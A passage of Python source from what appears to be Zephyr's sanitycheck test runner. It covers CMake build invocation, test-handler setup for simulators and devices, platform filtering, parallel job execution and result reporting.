p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")])
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite:
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
def __init__(self, board_root_list, testcase_roots, outdir):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixture = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = None
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
def save_reports(self, name, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if not no_update:
self.xunit_report(filename + ".xml", only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if 'sample.yaml' in filenames:
filename = 'sample.yaml'
elif 'testcase.yaml' in filenames:
filename = 'testcase.yaml'
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase()
tc.name = tc.get_unique(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.id = name
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixture
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform')
testcase_filter = kwargs.get('run_individual_tests')
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixture
)
if plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda tc: not tc.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir):
run = "Sanitycheck"
eleTestsuite = None
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
errors = 0
passes = 0
fails = 0
duration = 0
skips = 0
for _, instance in self.instances.items():
if instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails),
failures="%d" % fails,
errors="%d" % errors, skipped="%d" % skips)
handler_time = 0
# print out test results
for _, instance in self.instances.items():
if instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, os.path.basename(instance.testcase.name)),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
